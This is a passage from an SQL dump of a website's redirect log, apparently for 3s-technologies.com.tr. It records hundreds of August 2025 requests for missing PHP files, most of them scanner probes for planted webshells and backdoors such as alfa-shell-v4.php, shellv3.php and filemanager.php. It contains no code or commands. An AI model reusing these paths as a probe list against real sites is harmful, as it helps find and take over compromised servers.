00:00:00',301),(44095,'http://3s-technologies.com.tr/tr/wp-includes/sitemaps/providers/simple.php',NULL,'','',1,0,'2025-08-04 02:57:59','0000-00-00 00:00:00',301),(44096,'http://3s-technologies.com.tr/tr/wp-includes/block-supports/log.php',NULL,'','',1,0,'2025-08-04 02:58:00','0000-00-00 00:00:00',301),(44097,'http://3s-technologies.com.tr/tr/admin/packed.php',NULL,'','',1,0,'2025-08-04 02:58:01','0000-00-00 00:00:00',301),(44098,'http://3s-technologies.com.tr/tr/.well-known/goat1.php',NULL,'','',1,0,'2025-08-04 02:58:01','0000-00-00 00:00:00',301),(44099,'http://3s-technologies.com.tr/tr/wp-admin/js/widgets/moon.php',NULL,'','',1,0,'2025-08-04 02:58:02','0000-00-00 00:00:00',301),(44100,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/readme.php',NULL,'','',1,0,'2025-08-04 02:58:03','0000-00-00 00:00:00',301),(44101,'http://3s-technologies.com.tr/tr/wp-includes/id3/wp.php',NULL,'','',2,0,'2025-08-04 02:58:04','0000-00-00 00:00:00',301),(44102,'http://3s-technologies.com.tr/tr/wp-content/makeasmtp.php',NULL,'','',5,0,'2025-08-04 02:58:04','0000-00-00 00:00:00',301),(44103,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/buy.php',NULL,'','',1,0,'2025-08-04 02:58:05','0000-00-00 00:00:00',301),(44104,'http://3s-technologies.com.tr/tr/wp-includes/text/diff/engine/admin.php',NULL,'','',1,0,'2025-08-04 02:58:06','0000-00-00 00:00:00',301),(44105,'http://3s-technologies.com.tr/tr/wp-includes/customize/jp.php',NULL,'','',1,0,'2025-08-04 02:58:06','0000-00-00 00:00:00',301),(44106,'http://3s-technologies.com.tr/tr/wp-content/themes/cay-van-phong/function.php',NULL,'','',1,0,'2025-08-04 02:58:07','0000-00-00 00:00:00',301),(44107,'http://3s-technologies.com.tr/tr/wp-admin/user/db.php?u',NULL,'','',1,0,'2025-08-04 02:58:08','0000-00-00 00:00:00',301),(44108,'http://3s-technologies.com.tr/tr/wp-includes/images/smilies/buy.php',NULL,'','',1,0,'2025-08-04 02:58:09','0000-00-00 00:00:00',301),(44109,'http://3s-technologies.com.tr/tr/wp-includes/text/lock360.php',NULL,'','',1,0,'2025-08-04 02:58:10','0000-00-00 00:00:00',301),(44110,'http://3s-technologies.com.tr/tr/wp-includes/rest-api/endpoints/edit-tags.php',NULL,'','',1,0,'2025-08-04 02:58:12','0000-00-00 00:00:00',301),(44111,'http://3s-technologies.com.tr/tr/wp-includes/fonts/rk2.php',NULL,'','',1,0,'2025-08-04 02:58:14','0000-00-00 00:00:00',301),(44112,'http://3s-technologies.com.tr/tr/wp-includes/fonts/filemanager.php',NULL,'','',1,0,'2025-08-04 02:58:15','0000-00-00 00:00:00',301),(44113,'http://3s-technologies.com.tr/tr/wp-includes/text/xmrlpc.php',NULL,'','',1,0,'2025-08-04 02:58:17','0000-00-00 00:00:00',301),(44114,'http://3s-technologies.com.tr/tr/update/wp_filemanager.php',NULL,'','',1,0,'2025-08-04 02:58:17','0000-00-00 00:00:00',301),(44115,'http://3s-technologies.com.tr/tr/wp-includes/block-supports/fucku.php',NULL,'','',1,0,'2025-08-04 02:58:18','0000-00-00 00:00:00',301),(44116,'http://3s-technologies.com.tr/tr/wp-content/plugins/linkpreview/buy.php',NULL,'','',1,0,'2025-08-04 02:58:19','0000-00-00 00:00:00',301),(44117,'http://3s-technologies.com.tr/tr/wp-includes/text/diff/menu.php',NULL,'','',1,0,'2025-08-04 02:58:20','0000-00-00 00:00:00',301),(44118,'http://3s-technologies.com.tr/tr/wp-admin/includes/0x.php',NULL,'','',1,0,'2025-08-04 02:58:21','0000-00-00 00:00:00',301),(44119,'http://3s-technologies.com.tr/tr/wp-content/upgrade/fucku.php',NULL,'','',1,0,'2025-08-04 02:58:22','0000-00-00 00:00:00',301),(44120,'http://3s-technologies.com.tr/tr/wp-includes/block-supports/class.php',NULL,'','',1,0,'2025-08-04 02:58:23','0000-00-00 00:00:00',301),(44121,'http://3s-technologies.com.tr/tr/wp-content/uploads/2024/wp-damin.php',NULL,'','',1,0,'2025-08-04 02:58:23','0000-00-00 00:00:00',301),(44122,'http://3s-technologies.com.tr/tr/wp-content/themes/cay-van-phong/wp-configs.php',NULL,'','',1,0,'2025-08-04 02:58:24','0000-00-00 00:00:00',301),(44123,'http://3s-technologies.com.tr/tr/wp-mail.php/wp-includes/id3/as.php',NULL,'','',1,0,'2025-08-04 02:58:25','0000-00-00 00:00:00',301),(44124,'http://3s-technologies.com.tr/tr/files/themes.php',NULL,'','',1,0,'2025-08-04 02:58:26','0000-00-00 00:00:00',301),(44125,'http://3s-technologies.com.tr/tr/wp-includes/theme-compat/wp-conflg.php/wp-content/plugins/google-seo-rank/file.php',NULL,'','',1,0,'2025-08-04 02:58:27','0000-00-00 00:00:00',301),(44126,'http://3s-technologies.com.tr/tr/about/filemanager.php',NULL,'','',1,0,'2025-08-04 02:58:27','0000-00-00 00:00:00',301),(44127,'http://3s-technologies.com.tr/tr/about/mar.php',NULL,'','',1,0,'2025-08-04 02:58:29','0000-00-00 00:00:00',301),(44128,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/mpvloi.php',NULL,'','',1,0,'2025-08-04 02:58:30','0000-00-00 00:00:00',301),(44129,'http://3s-technologies.com.tr/tr/wp-includes/pomo/maint.php',NULL,'','',1,0,'2025-08-04 02:58:33','0000-00-00 00:00:00',301),(44130,'http://3s-technologies.com.tr/tr/index/f35.php',NULL,'','',1,0,'2025-08-04 02:58:35','0000-00-00 00:00:00',301),(44131,'http://3s-technologies.com.tr/tr/wp-includes/js/upload.php',NULL,'','',1,0,'2025-08-04 02:58:36','0000-00-00 00:00:00',301),(44132,'http://3s-technologies.com.tr/tr/wp-admin/core.php',NULL,'','',1,0,'2025-08-04 02:58:36','0000-00-00 00:00:00',301),(44133,'http://3s-technologies.com.tr/tr/wp-mail.php/wp-includes/id3/wp-2019.php',NULL,'','',1,0,'2025-08-04 02:58:38','0000-00-00 00:00:00',301),(44134,'http://3s-technologies.com.tr/tr/wp-content/mu-plugins/fm.php',NULL,'','',1,0,'2025-08-04 02:58:38','0000-00-00 00:00:00',301),(44135,'http://3s-technologies.com.tr/tr/wp-content/fm.php',NULL,'','',1,0,'2025-08-04 02:58:39','0000-00-00 00:00:00',301),(44136,'http://3s-technologies.com.tr/tr/wp-includes/text/diff/engine/hydxrmgtbh.php',NULL,'','',1,0,'2025-08-04 02:58:40','0000-00-00 00:00:00',301),(44137,'http://3s-technologies.com.tr/tr/wp-admin/includes/text.php',NULL,'','',1,0,'2025-08-04 02:58:41','0000-00-00 00:00:00',301),(44138,'http://3s-technologies.com.tr/tr/wp-includes/text.php',NULL,'','',1,0,'2025-08-04 02:58:44','0000-00-00 00:00:00',301),(44139,'http://3s-technologies.com.tr/tr/wp-admin/js/widgets/chosen.php',NULL,'','',2,0,'2025-08-04 02:58:45','0000-00-00 00:00:00',301),(44140,'http://3s-technologies.com.tr/tr/wp-includes/block-patterns/yes.php',NULL,'','',1,0,'2025-08-04 02:58:49','0000-00-00 00:00:00',301),(44141,'http://3s-technologies.com.tr/tr/wp-mail.php/wp-includes/id3/buy.php',NULL,'','',1,0,'2025-08-04 02:58:51','0000-00-00 00:00:00',301),(44142,'http://3s-technologies.com.tr/tr/wp-content/themes/aahana/themes.php',NULL,'','',1,0,'2025-08-04 02:58:52','0000-00-00 00:00:00',301),(44143,'http://3s-technologies.com.tr/tr/wp-mail.php/wp-includes/id3/edit.php',NULL,'','',1,0,'2025-08-04 02:58:53','0000-00-00 00:00:00',301),(44144,'http://3s-technologies.com.tr/tr/wp-content/plugins/hellopress/media.php.infected.php',NULL,'','',1,0,'2025-08-04 02:58:54','0000-00-00 00:00:00',301),(44145,'http://3s-technologies.com.tr/tr/wp-includes/style-engine/hehe.php',NULL,'','',1,0,'2025-08-04 02:58:55','0000-00-00 00:00:00',301),(44146,'http://3s-technologies.com.tr/tr/wp-includes/images/smilies/xp.php',NULL,'','',1,0,'2025-08-04 02:58:56','0000-00-00 00:00:00',301),(44147,'http://3s-technologies.com.tr/tr/.well-known/wp-trackback.php',NULL,'','',1,0,'2025-08-04 02:58:57','0000-00-00 00:00:00',301),(44148,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentytwo/radio.php',NULL,'','',1,0,'2025-08-04 02:58:58','0000-00-00 00:00:00',301),(44149,'http://3s-technologies.com.tr/tr/wp-includes/text/diff/engine/upload.php',NULL,'','',1,0,'2025-08-04 02:58:58','0000-00-00 00:00:00',301),(44150,'http://3s-technologies.com.tr/tr/wp-content/themes/seotheme/setup-config.php',NULL,'','',1,0,'2025-08-04 02:58:59','0000-00-00 00:00:00',301),(44151,'http://3s-technologies.com.tr/tr/wp-includes/sodium_compat/fucku.php',NULL,'','',1,0,'2025-08-04 02:59:00','0000-00-00 00:00:00',301),(44152,'http://3s-technologies.com.tr/tr/wp-includes/js/codemirror/wp-mail.php',NULL,'','',1,0,'2025-08-04 02:59:00','0000-00-00 00:00:00',301),(44153,'http://3s-technologies.com.tr/tr/wp-includes/php-compat/jp.php',NULL,'','',1,0,'2025-08-04 02:59:01','0000-00-00 00:00:00',301),(44154,'http://3s-technologies.com.tr/tr/img/buy.php',NULL,'','',1,0,'2025-08-04 02:59:02','0000-00-00 00:00:00',301),(44155,'http://3s-technologies.com.tr/tr/wp-includes/widgets/wp-2019.php',NULL,'','',1,0,'2025-08-04 02:59:02','0000-00-00 00:00:00',301),(44156,'http://3s-technologies.com.tr/tr/wp-content/themes/seotheme/bless.php',NULL,'','',1,0,'2025-08-04 02:59:03','0000-00-00 00:00:00',301),(44157,'http://3s-technologies.com.tr/tr/function/up.php',NULL,'','',1,0,'2025-08-04 02:59:04','0000-00-00 00:00:00',301),(44158,'http://3s-technologies.com.tr/tr/wp-content/themes/aahana/cong.php',NULL,'','',1,0,'2025-08-04 02:59:04','0000-00-00 00:00:00',301),(44159,'http://3s-technologies.com.tr/tr/wp-admin/css/test.php',NULL,'','',1,0,'2025-08-04 02:59:05','0000-00-00 00:00:00',301),(44160,'http://3s-technologies.com.tr/tr/wp-mail.php/wp-includes/id3/simple.php',NULL,'','',1,0,'2025-08-04 02:59:06','0000-00-00 00:00:00',301),(44161,'http://3s-technologies.com.tr/tr/wp-content/plugins/linkpreview/filemanager.php',NULL,'','',1,0,'2025-08-04 02:59:08','0000-00-00 00:00:00',301),(44162,'http://3s-technologies.com.tr/tr/wp-content/themes/aahana/webadmin.php',NULL,'','',1,0,'2025-08-04 02:59:09','0000-00-00 00:00:00',301),(44163,'http://3s-technologies.com.tr/wp-json/sure-triggers/v1/automation/action',NULL,'','',2,0,'2025-08-04 06:53:09','0000-00-00 00:00:00',301),(44164,'http://www.3s-technologies.com.tr/en/lead-free-solder\n',NULL,'','',1,0,'2025-08-04 08:15:20','0000-00-00 00:00:00',301),(44165,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/pcb-prototip-prototyping/pcb-kaz%c4%b1ma-milling',NULL,'http://www.google.com','',1,0,'2025-08-04 20:14:31','0000-00-00 00:00:00',301),(44166,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-seo-spy-google/ofc/php-ofc-library/ofc_upload_image.php',NULL,'','',2,0,'2025-08-05 03:27:18','0000-00-00 00:00:00',301),(44167,'http://3s-technologies.com.tr/tr/widwsisw/i/shx.php',NULL,'','',3,0,'2025-08-05 05:41:33','0000-00-00 00:00:00',301),(44168,'http://3s-technologies.com.tr/en/wp-includes/id3/index.php',NULL,'','',25,0,'2025-08-05 05:41:45','0000-00-00 00:00:00',301),(44169,'http://3s-technologies.com.tr/en/favicon.php',NULL,'','',21,0,'2025-08-05 05:41:46','0000-00-00 00:00:00',301),(44170,'http://3s-technologies.com.tr/en/shellv3.php',NULL,'','',6,0,'2025-08-05 05:41:47','0000-00-00 00:00:00',301),(44171,'http://3s-technologies.com.tr/en/simple/function.php',NULL,'','',4,0,'2025-08-05 05:41:47','0000-00-00 00:00:00',301),(44172,'http://3s-technologies.com.tr/en/wp-admin/maint/edit.php',NULL,'','',4,0,'2025-08-05 05:41:48','0000-00-00 00:00:00',301),(44173,'http://3s-technologies.com.tr/en/adminfuns.php7',NULL,'','',5,0,'2025-08-05 05:41:49','0000-00-00 00:00:00',301),(44174,'http://3s-technologies.com.tr/en/zwso.php',NULL,'','',7,0,'2025-08-05 05:41:50','0000-00-00 00:00:00',301),(44175,'http://3s-technologies.com.tr/en/.well-known/xoxo.php',NULL,'','',3,0,'2025-08-05 05:41:51','0000-00-00 00:00:00',301),(44176,'http://3s-technologies.com.tr/en/.well-known/zaza.php',NULL,'','',3,0,'2025-08-05 05:41:52','0000-00-00 00:00:00',301),(44177,'http://3s-technologies.com.tr/tr/akc.php?p=',NULL,'','',1,0,'2025-08-05 07:51:45','0000-00-00 00:00:00',301),(44178,'http://3s-technologies.com.tr/tr/goat.php',NULL,'','',144,0,'2025-08-05 07:52:05','0000-00-00 00:00:00',301),(44179,'http://3s-technologies.com.tr/tr/index.bak.php',NULL,'','',18,0,'2025-08-05 07:52:08','0000-00-00 00:00:00',301),(44180,'http://3s-technologies.com.tr/tr/ms-themes.php',NULL,'','',23,0,'2025-08-05 07:52:14','0000-00-00 00:00:00',301),(44181,'http://3s-technologies.com.tr/tr/options-general.php',NULL,'','',17,0,'2025-08-05 07:52:15','0000-00-00 00:00:00',301),(44182,'http://3s-technologies.com.tr/tr/options-reading.php',NULL,'','',21,0,'2025-08-05 07:52:15','0000-00-00 00:00:00',301),(44183,'http://3s-technologies.com.tr/tr/options-writing.php',NULL,'','',17,0,'2025-08-05 07:52:16','0000-00-00 00:00:00',301),(44184,'http://3s-technologies.com.tr/tr/robots.php',NULL,'','',23,0,'2025-08-05 07:52:19','0000-00-00 00:00:00',301),(44185,'http://3s-technologies.com.tr/tr/rt.php',NULL,'','',24,0,'2025-08-05 07:52:20','0000-00-00 00:00:00',301),(44186,'http://3s-technologies.com.tr/tr/setup.php',NULL,'','',23,0,'2025-08-05 07:52:21','0000-00-00 00:00:00',301),(44187,'http://3s-technologies.com.tr/tr/test1.php',NULL,'','',109,0,'2025-08-05 07:52:23','0000-00-00 00:00:00',301),(44188,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/light/wp-login.php',NULL,'','',21,0,'2025-08-05 07:52:30','0000-00-00 00:00:00',301),(44189,'http://3s-technologies.com.tr/tr/wp-admin/includes/colour.php',NULL,'','',16,0,'2025-08-05 07:52:31','0000-00-00 00:00:00',301),(44190,'http://3s-technologies.com.tr/tr/wp-admin/includes/header.php',NULL,'','',15,0,'2025-08-05 07:52:32','0000-00-00 00:00:00',301),(44191,'http://3s-technologies.com.tr/tr/wp-admin/wp-admins.php',NULL,'','',17,0,'2025-08-05 07:52:37','0000-00-00 00:00:00',301),(44192,'http://3s-technologies.com.tr/tr/wp-comments.php',NULL,'','',15,0,'2025-08-05 07:52:39','0000-00-00 00:00:00',301),(44193,'http://3s-technologies.com.tr/tr/wp-content/languages/autoload_classmap.php',NULL,'','',16,0,'2025-08-05 07:52:44','0000-00-00 00:00:00',301),(44194,'http://3s-technologies.com.tr/tr/wp-content/plugins/autoload_classmap.php',NULL,'','',25,0,'2025-08-05 07:52:45','0000-00-00 00:00:00',301),(44195,'http://3s-technologies.com.tr/tr/wp-content/plugins/ioxi/ioxi/dropdown.php',NULL,'','',18,0,'2025-08-05 07:52:46','0000-00-00 00:00:00',301),(44196,'http://3s-technologies.com.tr/tr/wp-content/plugins/up/main.php',NULL,'','',15,0,'2025-08-05 07:52:47','0000-00-00 00:00:00',301),(44197,'http://3s-technologies.com.tr/tr/wp-includes/phpmailer/file.php',NULL,'','',15,0,'2025-08-05 07:52:51','0000-00-00 00:00:00',301),(44198,'http://3s-technologies.com.tr/tr/wp-includes/css/autoload_classmap.php',NULL,'','',16,0,'2025-08-05 07:52:55','0000-00-00 00:00:00',301),(44199,'http://3s-technologies.com.tr/tr/wp-includes/fonts/autoload_classmap.php',NULL,'','',21,0,'2025-08-05 07:52:56','0000-00-00 00:00:00',301),(44200,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/langs/about.php',NULL,'','',15,0,'2025-08-05 07:52:58','0000-00-00 00:00:00',301),(44201,'http://3s-technologies.com.tr/tr/wp-setup.php',NULL,'','',54,0,'2025-08-05 07:53:04','0000-00-00 00:00:00',301),(44202,'http://3s-technologies.com.tr/tr/alexusmailer2.0.php',NULL,'','',1,0,'2025-08-05 11:43:58','0000-00-00 00:00:00',301),(44203,'https://3s-technologies.com.tr/tr/users/sign_in',NULL,'','',2,0,'2025-08-05 19:52:20','0000-00-00 00:00:00',301),(44204,'http://mail.3s-technologies.com.tr/tr/wp-includes/js/jquery/jquery.js',NULL,'','',1,0,'2025-08-05 21:46:13','0000-00-00 00:00:00',301),(44205,'http://3s-technologies.com.tr/tr/wp-includes/id3/esyfvxgmdq.php',NULL,'','',1,0,'2025-08-06 00:50:57','0000-00-00 00:00:00',301),(44206,'http://3s-technologies.com.tr/tr/wp-includes/requests/proxy/index.php?p=',NULL,'','',1,0,'2025-08-06 08:40:44','0000-00-00 00:00:00',301),(44207,'http://3s-technologies.com.tr/tr/wp-includes/images/wlw/index.php?p=',NULL,'','',1,0,'2025-08-06 08:40:58','0000-00-00 00:00:00',301),(44208,'http://3s-technologies.com.tr/tr/wp-includes/js/swfupload/index.php?p=',NULL,'','',1,0,'2025-08-06 08:41:03','0000-00-00 00:00:00',301),(44209,'http://3s-technologies.com.tr/tr/wp-includes/88.php',NULL,'','',9,0,'2025-08-06 16:31:53','0000-00-00 00:00:00',301),(44210,'http://3s-technologies.com.tr/tr/wp-includes/js/js420.php',NULL,'','',8,0,'2025-08-06 16:31:54','0000-00-00 00:00:00',301),(44211,'http://3s-technologies.com.tr/tr/1100.php',NULL,'','',22,0,'2025-08-06 16:32:04','0000-00-00 00:00:00',301),(44212,'http://3s-technologies.com.tr/tr/oo.php',NULL,'','',32,0,'2025-08-06 16:32:06','0000-00-00 00:00:00',301),(44213,'http://3s-technologies.com.tr/tr/sk.php',NULL,'','',12,0,'2025-08-06 16:32:07','0000-00-00 00:00:00',301),(44214,'http://3s-technologies.com.tr/tr/000.php',NULL,'','',41,0,'2025-08-06 16:32:09','0000-00-00 00:00:00',301),(44215,'http://3s-technologies.com.tr/tr/456.php',NULL,'','',18,0,'2025-08-06 16:32:11','0000-00-00 00:00:00',301),(44216,'http://3s-technologies.com.tr/tr/222.php',NULL,'','',285,0,'2025-08-06 16:32:15','0000-00-00 00:00:00',301),(44217,'http://3s-technologies.com.tr/tr/suu.php',NULL,'','',14,0,'2025-08-06 16:32:16','0000-00-00 00:00:00',301),(44218,'http://3s-technologies.com.tr/tr/build.php',NULL,'','',71,0,'2025-08-06 16:32:16','0000-00-00 00:00:00',301),(44219,'http://3s-technologies.com.tr/tr/i1.php',NULL,'','',14,0,'2025-08-06 16:32:17','0000-00-00 00:00:00',301),(44220,'http://3s-technologies.com.tr/tr/user/info.php',NULL,'','',9,0,'2025-08-06 16:32:21','0000-00-00 00:00:00',301),(44221,'http://3s-technologies.com.tr/tr/45.php',NULL,'','',11,0,'2025-08-06 16:32:26','0000-00-00 00:00:00',301),(44222,'http://3s-technologies.com.tr/tr/info/info.php',NULL,'','',9,0,'2025-08-06 16:32:35','0000-00-00 00:00:00',301),(44223,'http://3s-technologies.com.tr/tr/xc.php',NULL,'','',46,0,'2025-08-06 16:32:39','0000-00-00 00:00:00',301),(44224,'http://3s-technologies.com.tr/tr/qa.php',NULL,'','',11,0,'2025-08-06 16:32:40','0000-00-00 00:00:00',301),(44225,'http://3s-technologies.com.tr/tr/foo.php',NULL,'','',7,0,'2025-08-06 16:32:47','0000-00-00 00:00:00',301),(44226,'http://3s-technologies.com.tr/tr/yy.php',NULL,'','',15,0,'2025-08-06 16:32:49','0000-00-00 00:00:00',301),(44227,'http://3s-technologies.com.tr/tr/checker.php',NULL,'','',8,0,'2025-08-06 16:32:51','0000-00-00 00:00:00',301),(44228,'http://3s-technologies.com.tr/tr/cf.php',NULL,'','',17,0,'2025-08-06 16:32:54','0000-00-00 00:00:00',301),(44229,'http://3s-technologies.com.tr/tr/admin/uploads/images/autoload_classmap.php',NULL,'','',9,0,'2025-08-06 16:32:55','0000-00-00 00:00:00',301),(44230,'http://3s-technologies.com.tr/tr/er.php',NULL,'','',15,0,'2025-08-06 16:33:02','0000-00-00 00:00:00',301),(44231,'http://3s-technologies.com.tr/tr/alfa-shell-v4.php',NULL,'','',8,0,'2025-08-06 16:33:03','0000-00-00 00:00:00',301),(44232,'http://3s-technologies.com.tr/tr/333.php',NULL,'','',92,0,'2025-08-06 16:33:03','0000-00-00 00:00:00',301),(44233,'http://3s-technologies.com.tr/tr/ww.php',NULL,'','',53,0,'2025-08-06 16:33:11','0000-00-00 00:00:00',301),(44234,'http://www.3s-technologies.com.tr/en/wave-soldering\n',NULL,'','',1,0,'2025-08-07 05:39:30','0000-00-00 00:00:00',301),(44235,'http://3s-technologies.com.tr/tr/wp-admin/js/widgets/xp.php',NULL,'','',2,0,'2025-08-07 05:42:25','0000-00-00 00:00:00',301),(44236,'http://3s-technologies.com.tr/tr/wp-content/upgrade/cc.php',NULL,'','',2,0,'2025-08-07 05:42:25','0000-00-00 00:00:00',301),(44237,'http://3s-technologies.com.tr/tr/wp-mail.php/wp-includes/id3/function.php',NULL,'','',2,0,'2025-08-07 05:42:26','0000-00-00 00:00:00',301),(44238,'http://3s-technologies.com.tr/tr/wp-includes/rest-api/wp-mail.php',NULL,'','',3,0,'2025-08-07 05:42:27','0000-00-00 00:00:00',301),(44239,'http://3s-technologies.com.tr/tr/wp-includes/images/smilies/alfa-rex.php',NULL,'','',3,0,'2025-08-07 05:42:28','0000-00-00 00:00:00',301),(44240,'http://3s-technologies.com.tr/tr/wp-content/languages/fucku.php',NULL,'','',2,0,'2025-08-07 05:42:28','0000-00-00 00:00:00',301),(44241,'http://3s-technologies.com.tr/tr/wp-includes/block-patterns/worksec.php',NULL,'','',3,0,'2025-08-07 05:42:29','0000-00-00 00:00:00',301),(44242,'http://3s-technologies.com.tr/tr/wp-content/themes/aahana/worksec.php',NULL,'','',2,0,'2025-08-07 05:42:30','0000-00-00 00:00:00',301),(44243,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/coffee/mpvloi.php',NULL,'','',2,0,'2025-08-07 05:42:30','0000-00-00 00:00:00',301),(44244,'http://3s-technologies.com.tr/tr/wp-admin/json.php',NULL,'','',3,0,'2025-08-07 05:42:31','0000-00-00 00:00:00',301),(44245,'http://3s-technologies.com.tr/tr/wp-content/languages/classwithtostring.php',NULL,'','',3,0,'2025-08-07 05:42:32','0000-00-00 00:00:00',301),(44246,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentytwo/item.php',NULL,'','',3,0,'2025-08-07 05:42:33','0000-00-00 00:00:00',301),(44247,'http://3s-technologies.com.tr/tr/files/media.php.infected.php',NULL,'','',1,0,'2025-08-07 05:42:33','0000-00-00 00:00:00',301),(44248,'http://3s-technologies.com.tr/tr/wp-content/themes/cay-van-phong/hehe.php',NULL,'','',3,0,'2025-08-07 05:42:34','0000-00-00 00:00:00',301),(44249,'http://3s-technologies.com.tr/tr/wp-includes/pomo/moon.php',NULL,'','',6,0,'2025-08-07 05:42:35','0000-00-00 00:00:00',301),(44250,'http://3s-technologies.com.tr/tr/wp-includes/images/wlw/atomlib.php',NULL,'','',3,0,'2025-08-07 05:42:36','0000-00-00 00:00:00',301),(44251,'http://3s-technologies.com.tr/tr/wp-content/themes/seotheme/ty.php',NULL,'','',2,0,'2025-08-07 05:42:37','0000-00-00 00:00:00',301),(44252,'http://3s-technologies.com.tr/tr/wp-content/plugins/hellopress/item.php',NULL,'','',2,0,'2025-08-07 05:42:38','0000-00-00 00:00:00',301),(44253,'http://3s-technologies.com.tr/tr/wp-content/plugins/linkpreview/css_compare.php',NULL,'','',2,0,'2025-08-07 05:42:38','0000-00-00 00:00:00',301),(44254,'http://3s-technologies.com.tr/tr/wp-includes/rest-api/endpoints/atomlib.php',NULL,'','',3,0,'2025-08-07 05:42:39','0000-00-00 00:00:00',301),(44255,'http://3s-technologies.com.tr/tr/wp-includes/customize/as.php',NULL,'','',3,0,'2025-08-07 05:42:40','0000-00-00 00:00:00',301),(44256,'http://3s-technologies.com.tr/tr/wp-includes/customize/wp-damin.php',NULL,'','',2,0,'2025-08-07 05:42:41','0000-00-00 00:00:00',301),(44257,'http://3s-technologies.com.tr/tr/wp-includes/widgets/mah.php',NULL,'','',2,0,'2025-08-07 05:42:41','0000-00-00 00:00:00',301),(44258,'http://3s-technologies.com.tr/tr/wp-includes/text/diff/defaults.php',NULL,'','',3,0,'2025-08-07 05:42:42','0000-00-00 00:00:00',301),(44259,'http://3s-technologies.com.tr/tr/wp-content/themes/cay-van-phong/class.php',NULL,'','',2,0,'2025-08-07 05:42:42','0000-00-00 00:00:00',301),(44260,'http://3s-technologies.com.tr/tr/wp-content/system_log.php',NULL,'','',5,0,'2025-08-07 05:42:43','0000-00-00 00:00:00',301),(44261,'http://3s-technologies.com.tr/tr/wp-content/upgrade/readme.php',NULL,'','',2,0,'2025-08-07 05:42:44','0000-00-00 00:00:00',301),(44262,'http://3s-technologies.com.tr/tr/wp-includes/customize/0x.php',NULL,'','',3,0,'2025-08-07 05:42:45','0000-00-00 00:00:00',301),(44263,'http://3s-technologies.com.tr/tr/about/moon.php',NULL,'','',3,0,'2025-08-07 05:42:45','0000-00-00 00:00:00',301),(44264,'http://3s-technologies.com.tr/tr/js/edit.php',NULL,'','',3,0,'2025-08-07 05:42:46','0000-00-00 00:00:00',301),(44265,'http://3s-technologies.com.tr/tr/wp-admin/maint/fucku.php',NULL,'','',2,0,'2025-08-07 05:42:46','0000-00-00 00:00:00',301),(44266,'http://3s-technologies.com.tr/tr/wp-includes/text/diff/wp_filemanager.php',NULL,'','',2,0,'2025-08-07 05:42:47','0000-00-00 00:00:00',301),(44267,'http://3s-technologies.com.tr/tr/wp-includes/id3/f35.php',NULL,'','',3,0,'2025-08-07 05:42:48','0000-00-00 00:00:00',301),(44268,'http://3s-technologies.com.tr/tr/wp-content/upgrade-temp-backup/index.php',NULL,'','',2,0,'2025-08-07 05:42:49','0000-00-00 00:00:00',301),(44269,'http://3s-technologies.com.tr/tr/wp-content/mu-plugins/mpvloi.php',NULL,'','',3,0,'2025-08-07 05:42:49','0000-00-00 00:00:00',301),(44270,'http://3s-technologies.com.tr/tr/wp-admin/network/link.php',NULL,'','',3,0,'2025-08-07 05:42:50','0000-00-00 00:00:00',301),(44271,'http://3s-technologies.com.tr/tr/wp-content/languages/wp-configs.php',NULL,'','',3,0,'2025-08-07 05:42:51','0000-00-00 00:00:00',301),(44272,'http://3s-technologies.com.tr/tr/wp-admin/network/wp-2019.php',NULL,'','',2,0,'2025-08-07 05:42:52','0000-00-00 00:00:00',301),(44273,'http://3s-technologies.com.tr/tr/wp-content/plugins/hellopress/wp-trackback.php',NULL,'','',2,0,'2025-08-07 05:42:52','0000-00-00 00:00:00',301),(44274,'http://3s-technologies.com.tr/tr/images/text.php',NULL,'','',3,0,'2025-08-07 05:42:53','0000-00-00 00:00:00',301),(44275,'http://3s-technologies.com.tr/tr/function/doc.php',NULL,'','',3,0,'2025-08-07 05:42:54','0000-00-00 00:00:00',301),(44276,'http://3s-technologies.com.tr/tr/wp-mail.php/wp-includes/id3/class.php',NULL,'','',2,0,'2025-08-07 05:42:55','0000-00-00 00:00:00',301),(44277,'http://3s-technologies.com.tr/tr/function/class.php',NULL,'','',2,0,'2025-08-07 05:42:55','0000-00-00 00:00:00',301),(44278,'http://3s-technologies.com.tr/tr/wp-includes/sitemaps/providers/yes.php',NULL,'','',3,0,'2025-08-07 05:42:56','0000-00-00 00:00:00',301),(44279,'http://3s-technologies.com.tr/tr/wp-content/uploads/log.php',NULL,'','',3,0,'2025-08-07 05:42:57','0000-00-00 00:00:00',301),(44280,'http://3s-technologies.com.tr/tr/wp-content/upgrade/rk2.php',NULL,'','',3,0,'2025-08-07 05:42:58','0000-00-00 00:00:00',301),(44281,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentytwo/atomlib.php',NULL,'','',3,0,'2025-08-07 05:42:59','0000-00-00 00:00:00',301),(44282,'http://3s-technologies.com.tr/tr/wp-content/media.php',NULL,'','',2,0,'2025-08-07 05:43:00','0000-00-00 00:00:00',301),(44283,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-help/hehe.php',NULL,'','',3,0,'2025-08-07 05:43:00','0000-00-00 00:00:00',301),(44284,'http://3s-technologies.com.tr/tr/wp-includes/block-patterns/maint.php',NULL,'','',2,0,'2025-08-07 05:43:01','0000-00-00 00:00:00',301),(44285,'http://3s-technologies.com.tr/tr/wp-content/themes/seotheme/radio.php',NULL,'','',2,0,'2025-08-07 05:43:02','0000-00-00 00:00:00',301),(44286,'http://3s-technologies.com.tr/tr/wp-content/upgrade/go.php',NULL,'','',2,0,'2025-08-07 05:43:02','0000-00-00 00:00:00',301),(44287,'http://3s-technologies.com.tr/tr/wp-includes/moon.php',NULL,'','',2,0,'2025-08-07 05:43:03','0000-00-00 00:00:00',301),(44288,'http://3s-technologies.com.tr/tr/wp-includes/js/media.php',NULL,'','',2,0,'2025-08-07 05:43:03','0000-00-00 00:00:00',301),(44289,'http://3s-technologies.com.tr/tr/wp-includes/rest-api/endpoints/autoload_classmap.php',NULL,'','',2,0,'2025-08-07 05:43:04','0000-00-00 00:00:00',301),(44290,'http://3s-technologies.com.tr/tr/wp-includes/rest-api/edit-tags.php',NULL,'','',2,0,'2025-08-07 05:43:05','0000-00-00 